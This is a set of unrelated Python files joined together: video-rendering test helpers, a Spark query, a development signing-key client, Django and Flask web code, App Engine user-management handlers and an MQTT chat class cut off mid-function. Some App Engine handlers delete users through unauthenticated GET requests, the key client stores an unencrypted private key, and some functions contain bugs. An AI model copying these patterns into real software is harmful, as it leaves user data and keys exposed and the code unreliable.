from .mvrt import Core
assert is_true_or_non_zero(Core.MakeMuveeTimeline(mode, duration)), \
"MakeMuveeTimeline failed: " + GetLastErrorDescription()
@is_a_stub
def ThreadedMakeTillDone(mode, duration):
"""
Calls `IMVCore.MakeMuveeTimeline` in a separate thread and polls its
progress until making is done. The function will timeout after 600 seconds.
:param mode: `muvee.MakeFlags` enum
:param duration: Duration of muvee in seconds
"""
from .mvrt import Core
mode |= MakeFlags.THREADED
assert is_true_or_non_zero(Core.MakeMuveeTimeline(mode, duration)), \
"MakeMuveeTimeline failed: " + GetLastErrorDescription()
def poll():
prog = Core.GetMakeProgress()
assert prog >= 0, "GetMakeProgress failed: " + GetLastErrorDescription()
return prog
CheckProgress(poll, timeout=600, onStop=lambda: Core.CancelMake())
@is_a_stub
def ThreadedMakeForSaveTillDone(mode, duration):
"""
Calls `IMVCore.MakeMuveeTimeline` in a separate thread with the
`muvee.MakeFlags.FORSAVING` flag enabled, and polls its progress
until making is done.
:param mode: `muvee.MakeFlags` enum
:param duration: Duration of muvee in seconds
"""
mode |= MakeFlags.FORSAVING
ThreadedMakeTillDone(mode, duration)
@is_a_stub
def PreviewTillDone(timeline=TimelineType.MUVEE, width=320, height=240):
"""
Creates a WinForms Window and renders the muvee preview to it. The function
will timeout after 3600 seconds.
:param timeline: `muvee.TimelineFlag` enum
:param width: Width of created window in pixels
:param height: Height of created window in pixels
"""
from .mvrt import Core
assert width > 0
assert height > 0
flag = threading.Event()
# create winforms window
class Preview(Window):
def __enter__(self):
# setup and start the rendering
assert is_true_or_non_zero(
Core.SetupRenderTL2Wnd(timeline, self.hwnd, 0, 0, width, height, None)), \
'SetupRenderTL2Wnd failed: ' + GetLastErrorDescription()
Core.StartRenderTL2WndProc(timeline)
StartCheckProgress(self.poll, flag, onStop=lambda: self.close())
return self
def poll(self):
# get preview progress
prog = Core.GetRenderTL2WndProgress(timeline)
assert prog >= 0, "GetRenderTL2WndProgress failed: " + GetLastErrorDescription()
return prog
def __exit__(self, *args):
print 'Stopping.'
flag.set()
Core.StopRenderTL2WndProc(timeline)
Core.ShutdownRenderTL2Wnd(timeline)
def resized(self, *args):
assert is_true_or_non_zero(
Core.RefreshTL2Wnd(timeline, self.hwnd, 0, 0, width, height, None)), \
'RefreshTL2Wnd failed: ' + GetLastErrorDescription()
with Preview(width, height) as p:
p.show()
@is_a_stub
def SaveTillDone(filename, resolution=1000, timeout=1800):
"""
Saves the video to a filename. The function will timeout after
`resolution` x `timeout` milliseconds.
:param filename: Path of video file to save to
:param resolution: Frequency to poll for progress updates in milliseconds.
Default: 1000 milliseconds.
:param timeout: How many polls until the function is considered timed out.
Default: 1800 polls.
"""
from .mvrt import Core
caller = inspect.getouterframes(inspect.currentframe())[1][1]
runname = os.path.splitext(os.path.basename(caller))[0]
path = filename.replace("[CurrentStyle]", Core.GetActiveMVStyle()) \
.replace("[ConfigName]", runname)
path = normalize(path)
assert is_true_or_non_zero(
Core.StartRenderTL2FileProc(path, None, 0, 0, 0, 0, None)), \
("StartRenderTL2FileProc failed: " + GetLastErrorDescription())
def poll():
prog = Core.GetRenderTL2FileProgress()
assert prog >= 0, "GetRenderTL2FileProgress failed: " + GetLastErrorDescription()
return prog
StartCheckProgress(self.poll, timeout=timeout, \
onStop=lambda: Core.StopRenderTL2FileProc())
@is_a_stub
def SaveTillDoneWithPreview(filename, resolution=1000, timeout=1800, width=320, height=240):
"""
Saves the video to a filename. The function will timeout after
`resolution` x `timeout` milliseconds.
:param filename: Path of video file to save to
:param resolution: Frequency to poll for progress updates in milliseconds.
Default: 1000 milliseconds.
:param timeout: How many polls until the function is considered timed out.
Default: 1800 polls.
"""
from .mvrt import Core
assert width > 0
assert height > 0
caller = inspect.getouterframes(inspect.currentframe())[-1][1]
runname = os.path.splitext(os.path.basename(caller))[0]
path = filename.replace("[CurrentStyle]", Core.GetActiveMVStyle()) \
.replace("[ConfigName]", runname)
path = normalize(path)
flag = threading.Event()
# create winforms window
class Preview(Window):
def __enter__(self):
# setup and start the rendering
assert is_true_or_non_zero(
Core.StartRenderTL2FileProc(path, self.hwnd, 0, 0, width, height, None)), \
("StartRenderTL2FileProc failed: " + GetLastErrorDescription())
StartCheckProgress(self.poll, flag, timeout=timeout, \
sleep=resolution/1000.0, onStop=lambda: self.close())
return self
def poll(self):
# get saving progress
prog = Core.GetRenderTL2FileProgress()
assert prog >= 0, "GetRenderTL2FileProgress failed: " + GetLastErrorDescription()
return prog
def __exit__(self, *args):
print 'Stopping.'
flag.set()
Core.StopRenderTL2FileProc()
def resized(self, *args):
assert is_true_or_non_zero(
Core.RefreshTL2File(self.hwnd, 0, 0, width, height, None)), \
'RefreshTL2File failed: ' + GetLastErrorDescription()
with Preview(width, height) as p:
p.show()
def PreviewSourceTillDone(src, width=320, height=240):
"""
Creates a WinForms Window and renders the video preview to it
:param src: source object to be rendered
:param width: Width of created window in pixels
:param height: Height of created window in pixels
"""
assert width > 0
assert height > 0
flag = threading.Event()
# create winforms window
class Preview(Window):
def __enter__(self):
# setup and start the rendering
assert is_true_or_non_zero(
src.SetupRender(self.hwnd, 0, 0, width, height, None)), \
'SetupRender failed: ' + GetLastErrorDescription()
src.StartRenderProc()
StartCheckProgress(self.poll, flag, timeout=3600, onStop=lambda: self.close())
return self
def poll(self):
# get preview progress
prog = src.GetRenderProgress()
assert prog >= 0, "GetRenderProgress failed: " + GetLastErrorDescription()
return prog
def __exit__(self, *args):
print 'Stopping.'
flag.set()
src.StopRenderProc()
src.ShutdownRender()
def resized(self, *args):
assert is_true_or_non_zero(
src.RefreshRender(self.hwnd, 0, 0, width, height, None)), \
'RefreshRender failed: ' + GetLastErrorDescription()
with Preview(width, height) as p:
p.show()
@is_a_stub
def AddSourceVideoWithPreviewTillDone(path, height=320, width=240):
"""
Adds a video source and previews it.
:param path: Location of video file to be added
:param width: Width of created window in pixels
:param height: Height of created window in pixels
"""
src = CreateSource(path, SourceType.VIDEO)
AddSource(src, SourceType.VIDEO, LoadFlags.VERIFYSUPPORT)
PreviewSourceTillDone(src, height, width)
def translate_alignment(align):
"""
Decodes an integer into a tuple for horizontal and vertical height
:param align: alignment integer to decode
"""
h = v = 0
bits = (align & 0x38) >> 3
if bits & 0x4 == bits:
v = 0x1 # top
elif bits & 0x2 == bits:
v = 0x10 # center
elif bits & 0x1 == bits:
v = 0x2 # bottom
else:
return h, v
bits = align & 0x7
if bits & 0x4 == bits:
h = 0x4 # left
elif bits & 0x2 == bits:
h = 0x10 # center
elif bits & 0x1 == bits:
h = 0x8 # right
else:
return h, v
return h, v
def add_image(xml):
"""
Adds an image from a .rvl project file XML node
"""
from . import IMVCoreFactory, IMVSourceCaption
from .mvrt import Core
# create image source
path = xml.find('name').text
assert os.path.isfile(path)
src = CreateSource(path, SourceType.IMAGE)
# add magic spot rectangles
magicspot = xml.find('magicSpot')
if magicspot is not None:
rect = gen_stub(IMVTargetRect)(src)
if int(magicspot.attrib.get('activetype', 0)) > 0:
for r in magicspot.findall('targetrects/rect'):
rect.AddTargetRect(float(r.attrib['X1']), float(r.attrib['X2']), \
float(r.attrib['Y1']), float(r.attrib['Y2']))
# captions
caption = xml.find('caption')
if caption is not None:
factory = gen_stub(IMVCoreFactory)(Core)
fmt = factory.CreateMVTextFormatObj()
fmt.LogFontStr = caption.attrib['font']
fmt.Color = long(caption.attrib['fontcolor'])
fmt.TextRectXCoord = float(caption.attrib['offsetX'])
fmt.TextRectYCoord = float(caption.attrib['offsetY'])
fmt.TextRectHeight = float(caption.attrib['height'])
fmt.TextRectWidth = float(caption.attrib['width'])
fmt.HorAlign, fmt.VertAlign = translate_alignment(long(caption.attrib['align']))
cap = gen_stub(IMVSourceCaption)(src)
cap.Caption = caption.attrib['string']
cap.TextDisplayFormat = fmt
# orientation and duration
info = gen_stub(IMVImageInfo)(src)
info.SetOrientation(float(xml.find('rotation').text), True)
info.MinImgSegDuration = float(xml.find('minDur').text)
AddSource(src, SourceType.IMAGE, LoadFlags.VERIFYSUPPORT)
def add_music(xml):
"""
Adds a music file from a .rvl project file XML node
"""
path = xml.find('name').text
assert os.path.isfile(path)
src = CreateSource(path, SourceType.MUSIC)
start = float(xml.find('cliprange').attrib['start'])
stop = float(xml.find('cliprange').attrib['stop'])
if start != stop:
src.Start, src.Stop = start, stop
AddSource(src, SourceType.MUSIC, LoadFlags.VERIFYSUPPORT)
def add_video(xml):
"""
Adds a video file from a .rvl project file XML node
"""
from . import IMVCoreFactory, IMVCaptionHighlight
from .mvrt import Core
# create video source
path = xml.find('name').text
assert os.path.isfile(path)
src = CreateSource(path, SourceType.VIDEO)
# captions
for caption in xml.findall('captions/caption'):
factory = gen_stub(IMVCoreFactory)(Core)
fmt = factory.CreateMVTextFormatObj()
fmt.LogFontStr = caption.find('font').text
fmt.Color = long(caption.find('fontcolor').text)
fmt.TextRectXCoord = float(caption.find('offsetX').text)
fmt.TextRectYCoord = float(caption.find('offsetY').text)
fmt.TextRectHeight = float(caption.find('height').text)
fmt.TextRectWidth = float(caption.find('width').text)
fmt.HorAlign, fmt.VertAlign = translate_alignment(long(caption.find('align').text))
cap = gen_stub(IMVCaptionHighlight)(src)
cap.SetCaptionHighlight(caption.find('string').text,
float(caption.find('timeStart').text),
float(caption.find('timeEnd').text),
fmt)
# highlights
for hilite in xml.findall('highlights/highlight'):
h = gen_stub(IMVHighlight)(src)
h.SetHighlight(float(hilite.find('start').text), float(hilite.find('stop').text))
# exclusions
for exclude in xml.findall('excludes/exclude'):
e = gen_stub(IMVExclude)(src)
e.SetIMVExclude(float(exclude.find('start').text), float(exclude.find('stop').text))
# clipping
start = float(xml.find('cliprange').attrib['start'])
stop = float(xml.find('cliprange').attrib['stop'])
if start != stop:
src.Start, src.Stop = start, stop
AddSource(src, SourceType.VIDEO, LoadFlags.VERIFYSUPPORT)
def add_settings(xml):
"""
Load project configuration from a .rvl project file XML node
"""
from . import IMVCoreFactory
from .mvrt import Core
Core.SetActiveMVStyle(xml.find('SelectedStyle').text)
factory = gen_stub(IMVCoreFactory)(Core)
# style parameters
if xml.find('SuperStyles[@default="0"]/parameter') is not None:
ex = gen_stub(IMVStyleEx)(Core.GetStyleCollection())
style = xml.find('SelectedStyle').text
for p in xml.findall('SuperStyles/parameter'):
ex.SetParam(style, p.attrib['name'], float(p.attrib['value']))
# style parameter strings
if xml.find('StyleTextParams/parameter') is not None:
ex = gen_stub(IMVStyleEx3)(Core.GetStyleCollection())
style = xml.find('SelectedStyle').text
for p in xml.findall('StyleTextParams/parameter'):
ex.SetStringParam(style, p.attrib['name'], p.attrib['value'])
# titles
tc = gen_stub(IMVTitleCredits)(Core.Styles)
if xml.find('EnableTitle').text == '1':
fmt = factory.CreateMVTextFormatObj()
fmt.LogFontStr = xml.find('TitleFont').text
fmt.Color = long(xml.find('TitleColor').text)
tc.TitleString = xml.find('TitleText').text
tc.TitleTextFormat = fmt
type = int(xml.find('TitleBackgroundType').text)
if type == 1:
tc.TitleBackgroundColor = long(xml.find('TitleBackgroundColor').text)
elif type == 2:
tc.TitleBackgroundImage = xml.find('TitleBackgroundImage').text
# credits
if xml.find('EnableCredits').text == '1':
fmt = factory.CreateMVTextFormatObj()
fmt.LogFontStr = xml.find('CreditsFont').text
fmt.Color = long(xml.find('CreditsColor').text)
tc.CreditsString = xml.find('CreditsText').text
tc.CreditsTextFormat = fmt
type = int(xml.find('CreditsBackgroundType').text)
if type == 1:
tc.CreditsBackgroundColor = long(xml.find('CreditsBackgroundColor').text)
elif type == 2:
tc.CreditsBackgroundImage = xml.find('CreditsBackgroundImage').text
# volume control
Core.AudioExtLevel = float(xml.find('AudioMix/Voiceover').text)
Core.SoundEffectLevel = float(xml.find('AudioMix/SoundFx').text)
Core.SyncSoundLevel = float(xml.find('AudioMix/Video').text)
Core.MusicLevel = float(xml.find('AudioMix/Music').text)
@is_a_stub
def LoadRvlProject(path):
"""
Loads any image, music or video sources from a .rvl project file as well as
relevant project settings.
:param path: Path to .rvl project file
"""
path = normalize(path)
assert os.path.isfile(path) and os.path.splitext(path)[1] == ".rvl"
xml = etree.parse(path)
# find all source files
sources = [(f, SourceType.IMAGE) for f in xml.findall('image/file')] + \
[(f, SourceType.MUSIC) for f in xml.findall('audio/file')] + \
[(f, SourceType.VIDEO) for f in xml.findall('video/file')]
# sort sources by predefined indexes
def cmp_index(x, y):
if x[0].find('index') is None:
return -1
if y[0].find('index') is None:
return 1
return cmp(int(x[0].find('index').text), int(y[0].find('index').text))
sources.sort(cmp=cmp_index)
detect_media(*[s[0].find('name').text for s in sources])
for src, type in sources:
if type == SourceType.IMAGE:
add_image(src)
elif type == SourceType.MUSIC:
add_music(src)
elif type == SourceType.VIDEO:
add_video(src)
else:
raise NotImplementedError(str(type))
# process settings
add_settings(xml.find('settings'))
@is_a_stub
def VerifyVideo(src_file, expected_width, \
expected_height, \
expected_aspect_ratio, \
expected_aspect_ratio_x, \
expected_aspect_ratio_y):
try:
from . import IMVVideoInfo3
except:
# mac doesn't have IMVVideoInfo3
from . import IMVVideoInfo2 as IMVVideoInfo3
src = CreateSource(src_file, SourceType.VIDEO)
vid_info = gen_stub(IMVVideoInfo3)(src)
assert vid_info.width == expected_width and vid_info.height == expected_height, \
"Media width/height verification failed: %s" % src_file
assert vid_info.AspectRatio == int(expected_aspect_ratio), \
"Media aspect ratio verification failed: %s" % src_file
assert vid_info.AspectRatioX == expected_aspect_ratio_x and \
vid_info.AspectRatioY == expected_aspect_ratio_y, \
"Media aspect ratio verification failed: %s" % src_file
@is_a_stub
def CheckLastTimelineForRange(floor, ceiling):
from .mvrt import Core
dur = Core.GetTimelineDuration(TimelineType.FINALPREV) # TimelineType for backward compatibility
assert dur <= ceiling, \
"dur = " + str(dur) + ", ceiling = " + str(ceiling)
assert dur >= floor, \
"dur = " + str(dur) + ", floor = " + str(floor)
@is_a_stub
def ClearDescriptors():
from .mvrt import Core
path = os.path.join(Core.CommonDataFolder, "dscrp")
if os.path.isdir(path):
for root, dirs, files in os.walk(path):
for f in files:
print "Deleting", os.path.join(root, f)
os.remove(os.path.join(root, f))
|
from utils.default import factor_db
from utils.spark_app import MovieDataApp
spark = MovieDataApp().spark
def get_match_id():
# movie_play有的aid对应多个qid,以aid去重
ys_df = spark.sql("select qid, aid ys_id, cid from {}.movie_play".format(factor_db)).dropDuplicates(['ys_id'])
# db_asset_source这个表aid有重复的,去重
os_df = spark.sql("select aid os_id, source, title, sid from movie.db_asset_source")\
.where('source=12').dropDuplicates(['os_id'])
# 查看过没有重复的
os_aid_cid = spark.sql("select id, cid os_cid from movie.db_asset")
os_df = os_df.join(os_aid_cid, os_df.os_id == os_aid_cid.id, how='left').drop('id')
# os_df.show()
tmp = os_df.join(ys_df, (os_df.sid == ys_df.qid) & (os_df.os_cid ==ys_df.cid), how='left')\
.dropDuplicates(['os_id']).drop('source', 'sid', 'qid', 'cid').dropna()
return tmp # os_id, title, os_cid, ys_id |
import os.path
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.serialization import load_pem_private_key
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.exceptions import InvalidSignature
"""
TODO: This class will handle the connection to KMIP-compliant key management server
at the moment the chosen reference is: https://pykmip.readthedocs.io/en/latest/index.html
TODO: once the functions from pykmip are clear, define the abastract methods
"""
#from kmip.pie import objects
#from kmip.pie import client
#from kmip import enums
class KeyManagementClientFactory:
def __init__(self):
self._builders = {}
def register_builder(self, key, builder):
self._builders[key] = builder
def create(self, key, **kwargs):
builder = self._builders.get(key)
if not builder:
# return default
builder = DevKeyManagementClientBuilder(**kwargs)
return builder(**kwargs)
class DevKeyManagementClientBuilder:
def __init__(self, **_ignored):
#TODO: **ignored could be the path where to look for and create the key file
self._instance = None
def __call__(self, **ignored):
if not self._instance:
self._instance = DevKeyManagementClient()
return self._instance
class DevKeyManagementClient:
#basic KM tool with a local private key saved in the __file__ folder
#for developing, testing, sandbox usage only
_type = 'DEV'
_priv_key = None
def __init__(self):
try:
self._priv_key = self._get_key();
except OSError as e:
self._priv_key = self._generate_key()
except Exception as e:
print(e)
raise Exception('Something wrong with Key Management Init')
def _get_key(self, *args, **kwargs):
"""
Get the key from the default path
the default path for now is the same folder as the __file__,
if the .pem is not there, OSError is raised so that
the caller can act accordingly. Notice that DEVClient uses EC.
Params:
-------
Returns:
--------
EllipticCurvePrivateKey
as for the cryptography library
Raises:
-------
OSError
When the file is not there
ValueError, TypeError, UnsupportedAlgorithm
When there is something wrong in the file
"""
filename = os.path.join(os.path.dirname(__file__), 'privkey.pem')
with open(filename, 'rb') as pem_in:
pemlines = pem_in.read()
priv_key = load_pem_private_key(pemlines, None, default_backend())
pub_key = priv_key.public_key()
serialized_pub_key = pub_key.public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
)
return priv_key
def _generate_key(self, *args, **kwargs):
"""
Generate a new key
the default path for now is the same folder as the __file__,
a new file will be saved there and it will be a PEM
representation of an EC private key
Params:
-------
Returns:
--------
EllipticCurvePrivateKey
as for the cryptography library
Raises:
-------
OSError
When there are problems in writing the file
"""
priv_key = ec.generate_private_key(ec.SECP384R1(), default_backend())
filename = os.path.join(os.path.dirname(__file__), 'privkey.pem')
pem = priv_key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.TraditionalOpenSSL,
encryption_algorithm=serialization.NoEncryption()
)
with open(filename, 'wb') as pem_out:
pem_out.write(pem)
return priv_key
def get_serialized_pub_key(self):
"""
Get the serialised public key with PEM encoding of this eonpass node
Params
------
Returns
-------
bytes
the serialised data with the PEM encoding
Raises
------
"""
priv_key = self._priv_key
pub_key = priv_key.public_key()
serialized_key = pub_key.public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
)
return serialized_key
def sign_bytes_message(self, message):
"""
sign a message with the local liquid node
get a local address, use its embedded.confidential_key as private key
and return the signed message and its serialized public_key
Parameters
----------
message: bytes
the message to be signed by the node
Returns
--------
dict
{signed, serialized_public}, a JSON containind the
signed messaged and its respective serialized public key
in bytes
Raises
------
Exception
when message is not in bytes
"""
priv_key = self._priv_key
pub_key = priv_key.public_key()
serialized_key = pub_key.public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
)
signed = priv_key.sign(message, ec.ECDSA(hashes.SHA256()))
return {'signed': signed, 'serialized_public': serialized_key}
def verify_signed_message(self, signed, message, serialized_public):
"""
check if a message and a signature are matching given the pub key
note that the signature may be sent over by another node,
therefore we also need to know the public_key
Parameters
----------
signed: bytes
the signed version
message: str or bytes
the original message that was signed
serialized_public: str (utf-8 decoded) or bytes
the public key in PEM encoding
Returns
--------
bool
True if the signed message check out, False otherwise.
Note that anything going wrong is catched and
the method just returns False
"""
try:
print("inside factory")
if(isinstance(serialized_public, str)):
serialized_public = serialized_public.encode()
loaded_public_key = serialization.load_pem_public_key(
serialized_public,
backend=default_backend()
)
if(isinstance(message, str)):
message = message.encode()
# this raises exception if the signature is not valid
loaded_public_key.verify(
signed, message, ec.ECDSA(hashes.SHA256())) #bytes -> str: decode; str->bytes: encode
return True
except ValueError as ve:
print("value error", ve)
return False
except InvalidSignature as invalid:
print("invalid", invalid)
return False
except Exception as e:
print("general exc", e)
return False
|
from django import forms
from .models import Detail, Calc, Comment, FurnitureInCalc
class DetailForm(forms.ModelForm):
"""Форма для работы с деталями."""
class Meta:
model = Detail
exclude = [""]
class CommentForm(forms.ModelForm):
"""Форма для работы с коментариями."""
class Meta:
model = Comment
exclude = ["calc"]
widgets = {
'name': forms.TextInput(attrs={'class':'form-control'}),
'text': forms.Textarea(attrs={'class':'form-control'}),
}
class CalcForm(forms.ModelForm):
"""Форма для работы с расчётами."""
class Meta:
model = Calc
fields = ["title","tags"]
widgets = {
'title': forms.TextInput(attrs={'class':'form-control'}),
'tags': forms.Select(attrs={'class':'form-control'}),
}
class FurnitureInCalcForm(forms.ModelForm):
"""Форма для добавления фурнитуры не из БД."""
class Meta:
model = FurnitureInCalc
exclude = ["calc", "furniture", "total_price"]
widgets = {
'title': forms.TextInput(attrs={'class':'form-control'}),
'article': forms.TextInput(attrs={'class':'form-control'}),
'price': forms.TextInput(attrs={'class':'form-control'}),
'price_retail': forms.TextInput(attrs={'class':'form-control'}),
'availability': forms.TextInput(attrs={'class':'form-control'}),
'nmb': forms.TextInput(attrs={'class':'form-control'}),
} |
from flask import Blueprint, render_template, redirect, url_for
from app.forms.property import LandingAddressForm
from app.models.address import Address
from app.models.property import Property
bp = Blueprint('landing', __name__)
@bp.route('/', methods=['GET', 'POST'])
def index():
form = LandingAddressForm()
if form.validate_on_submit():
if form.validate_on_submit():
address_data = {
'line_1': form.street_number.data + " " + form.route.data,
'city': form.locality.data,
'state_code': form.administrative_area_level_1.data,
'postal_code': form.postal_code.data,
'country': form.country.data
}
return redirect(url_for('evaluation.new', **address_data))
return render_template('landing/index.html', form=form)
@bp.route('/about', methods=['GET'])
def about():
return render_template('landing/about.html')
@bp.route('/contact', methods=['GET'])
def contact():
return render_template('landing/contact.html')
@bp.route('/privacy', methods=['GET'])
def privacy():
return render_template('landing/privacy.html')
@bp.route('/services', methods=['GET', 'POST'])
def services():
return render_template('landing/services.html')
@bp.route('/terms', methods=['GET'])
def terms():
return render_template('landing/terms.html')
@bp.route('/pricing', methods=['GET', 'POST'])
def pricing():
form = LandingAddressForm()
if form.validate_on_submit():
address_data = {
'line_1': form.street_number.data + " " + form.route.data,
'city': form.locality.data,
'state_code': form.administrative_area_level_1.data,
'postal_code': form.postal_code.data,
'country': form.country.data
}
return redirect(url_for('evaluation.new', **address_data))
return render_template('landing/pricing.html', form=form)
|
# Generated by Django 4.0 on 2021-12-18 20:19
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Event',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('event_cod', models.CharField(max_length=200, unique=True, verbose_name='Codigo Identificacion')),
('event_nom', models.CharField(max_length=200, verbose_name='Nombre del Evento')),
('event_date_init', models.DateField(blank=True, null=True, verbose_name='Fecha de Inicio')),
('even_date_end', models.DateField(blank=True, null=True, verbose_name='Fecha de Finalizacion')),
('event_site', models.TextField(blank=True, max_length=500, null=True, verbose_name='Lugar del Evento')),
('event_url', models.URLField(blank=True, null=True, verbose_name='Pagina Web')),
],
),
]
|
# -*- coding: utf-8 -*-
#!/usr/bin/env python
#
import main
import json
import logging
import os
import urllib
import webapp2
from google.appengine.api import users
from google.appengine.ext.webapp import template
from google.appengine.ext import blobstore
from google.appengine.ext.webapp import blobstore_handlers
from google.appengine.ext import db
class UserDB(db.Model):
userName = db.StringProperty(u'')
userEMail = db.StringProperty(u'')
userId = db.StringProperty(u'')
userLevel = db.StringProperty(u'')
privileges = db.ListProperty(str, default=[])
lastUpdate = db.DateTimeProperty(auto_now=True, auto_now_add=True)
defaultDB = db.StringProperty(u'')
comment = db.StringProperty('')
affiliation = db.StringProperty('')
# Return info based on current user.
def getUserInfo(login_target='/', logout_target='/'):
current_user = users.get_current_user()
user_nickname = None
user_logout = None
user_login = None
isAdmin = None
user_login = users.create_login_url(login_target)
if current_user:
user_logout = users.create_logout_url('/')
user_nickname = current_user.nickname()
user_login = users.create_login_url('/words/getWords/')
isAdmin = users.is_current_user_admin()
# logging.info('%s, %s, %s, %s' % (current_user, user_nickname, user_logout, user_login))
return (current_user, user_nickname, user_logout, user_login, isAdmin)
class manageUsers(webapp2.RequestHandler):
def get(self):
user_info = getUserInfo(self.request.url)
q = UserDB.all()
userCount = 0
userList = []
roleList = ['Admin', 'Edit', 'View']
for p in q.run():
userCount += 1
userList.append(p)
template_values = {
'language': main.Language,
'roleList': roleList,
'userList': userList,
'userInfo': user_info,
'user_nickname': user_info[1],
'user_logout': user_info[2],
'user_login_url': user_info[3],
}
path = os.path.join(os.path.dirname(__file__), 'users.html')
self.response.out.write(template.render(path, template_values))
class addUser(webapp2.RequestHandler):
def get(self):
newUserEmail = self.request.get('userEmail', None)
userRole = self.request.get('role', None)
privileges = self.request.GET.getall('privileges')
userName = self.request.get('userName', None)
self.response.out.write('\nArguments = %s' % self.request.arguments())
self.response.out.write('\nEMail = %s' % newUserEmail)
self.response.out.write('\nuserName = %s' % userName)
self.response.out.write('\nprivileges = %s' % privileges)
q = UserDB.all()
q.filter('userEMail =', newUserEmail)
p = q.get() # Get all the matching emails.
if p:
self.response.out.write('\n!!!: User %s already in database: %s\n' % (
p, p.userLevel))
else:
newUser = UserDB(userEMail=newUserEmail,
userName=userName,
userLevel=userRole,
privileges=privileges,)
newUser.put()
self.response.out.write('\n!!!: Added User %s (%s) in role %s' % (
newUser.userName, newUser.userEMail, newUser.userLevel))
class deleteUser(webapp2.RequestHandler):
def get(self):
userEMails = self.request.GET.getall('userDelete')
logging.info('Emails to delete: %s' % userEMails)
confirm = self.request.get('confirmDelete', None)
if not confirm:
self.response.out.write('\n!!!: Delete not confirmed!')
numDeleted = 0
for email in userEMails:
q = UserDB.all()
q.filter('userEMail =', email)
self.response.out.write('\n!!!: email = %s\n' % (email))
p = q.get() # Get all the matching emails.
self.response.out.write('\n!!!: p=: %s)\n' % (p))
if p is not None:
self.response.out.write('\n!!!: User %s to be deleted from database: %s \n' % (p.userName, p.userEMail))
UserDB.delete(p)
numDeleted += 1
else:
self.response.out.write('\n!!!: No such email in database: %s\n' % (
email))
self.response.out.write('\n!!!: %d users were deleted from database\n' % (numDeleted))
class clearUsers(webapp2.RequestHandler):
def get(self):
q = UserDB.all()
numDeleted = 0
for p in q.run():
UserDB.delete(p)
numDeleted += 1
self.response.out.write('\n%d users deleted' % numDeleted)
|
# Generated by Django 3.0.4 on 2021-01-12 10:48
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('scout', '0004_auto_20200417_1034'),
]
operations = [
migrations.AddField(
model_name='recipe',
name='sampling_technique',
field=models.CharField(choices=[('top', 'Top'), ('random', 'Random'), ('stratified', 'Stratified')], default='top', max_length=64),
),
]
|
######################################
# File Name : mqtt_message
#
# Author : Thomas Kost, some edits by Nico
#
# Date: October 24, 2020
#
# Breif : file generalizing sending and recieving of MQTT messages
#
######################################
import json
import paho.mqtt.client as mqtt
import time
import datetime
import queue
class MQTTLink:
# MQTT client functions
def __on_connect_subscriber(self, client, userdata, flags, rc):
# Subscribing in on_connect() means that if we lose the connection and
# reconnect then subscriptions will be renewed.
client.subscribe(self.board, qos=1)
def __on_disconnect_subscriber(self, client, userdata, rc):
if rc != 0:
print('Unexpected Disconnect')
else:
print('Expected Disconnect')
def __on_connect_publisher(self, client, userdata, flags, rc):
print("Connection returned result: "+str(rc))
def __on_disconnect_publisher(self, client, userdata, rc):
if rc != 0:
print('Unexpected Disconnect')
else:
print('Expected Disconnect')
def __on_message(self, client, userdata, message):
#filter data to get only json
#parse message
cur = json.loads(str(message.payload)[2:-1])
# do not receive our own messages
if not (cur["senderID"]==self.user):
self.receiveMessage(cur)
def __init__(self, board, user, color = "white", emoji = "/smileyface"):
self.tx = mqtt.Client()
self.rx = mqtt.Client()
self.board = board
self.messages = {"acks":[],
"messages":[],
"senderID": user,
"senderColor": color,
"senderEmojiImage":emoji
}
self.count = 0
self.user = user
self.last_recieved = {}
self.network = {}
#configure client
# configure transmission
self.tx.on_connect = self.__on_connect_publisher
self.tx.on_disconnect = self.__on_disconnect_publisher
# configure reception
self.rx.on_connect = self.__on_connect_subscriber
self.rx.on_disconnect = self.__on_disconnect_subscriber
self.rx.on_message = self.__on_message
self.tx.connect_async('mqtt.eclipseprojects.io')
self.rx.connect_async('mqtt.eclipseprojects.io')
self.listen_called = False
def __del__(self):
if self.listen_called:
self.rx.loop_stop()
self.tx.disconnect()
self.rx.disconnect()
def __addMessage(self, message_content):
self.messages["messages"].append(message_content)
self.count +=1
def __add_ack(self,ID):
if not (ID in self.messages["acks"]):
self.messages["acks"].append(ID)
def __recieve_ack(self, ID):
for message in self.messages["messages"]:
if ID == message["ID"]:
self.messages["messages"].remove(message)
def receiveMessage(self, message):
# note: there can be multiple messages )in the stack recieved
form_message = ''
if message["senderID"] not in self.last_recieved:
self.last_recieved[message["senderID"]]= []
self.network[message["senderID"]] = {
"color":message["senderColor"],
"emojiID": message["senderEmojiImage"]
}
for msg in message["messages"]:
if (msg["reciever"] == self.user or msg["reciever"] == "all") and (msg["ID"] not in self.last_recieved[message["senderID"]]):
form_message += msg['sender'] + " said: " + msg['data'] + '\n'
# recieve acks
for ack in message["acks"]:
self.__recieve_ack(ack)
# add any new acks
for msg in message["messages"]:
self.__add_ack(msg["ID"])
# we can change the contents of form message if another format is more desirable
if form_message :
print(form_message)
# record message IDs
IDs = []
for msg in message["messages"]:
IDs.append(msg["ID"])
self.last_recieved[message["senderID"]] = IDs
def addText(self, text, reciever):
now = datetime.datetime.now()
ID = self.board + '_' + self.user + '_' + str(self.count)
msg = {
"message_type" : "text",
"sender" : self.user,
"reciever" : reciever,
"data" : text,
"time" : {
"hour":now.hour,
"minute": now.minute,
"second": now.second
},
"ID" : ID
}
self.__addMessage(msg)
def addGesture(self, gesture, reciever):
now = datetime.datetime.now()
ID = self.board + '_' + self.user + '_' + str(self.count)
msg = {
"message_type" : "gesutre",
"sender" : self.user,
"reciever" : reciever,
"data" : gesture,
"time" : {
"hour":now.hour,
"minute": now.minute,
"second": now.second
},
"ID" : ID
}
self.__addMessage(msg)
def send(self):
self.tx.loop_start()
# just toss it all out there
self.tx.publish(self.board, json.dumps(self.messages), qos=1)
self.tx.loop_stop()
def listen(self, duration= -1):
#only listen if a reciever is initiated
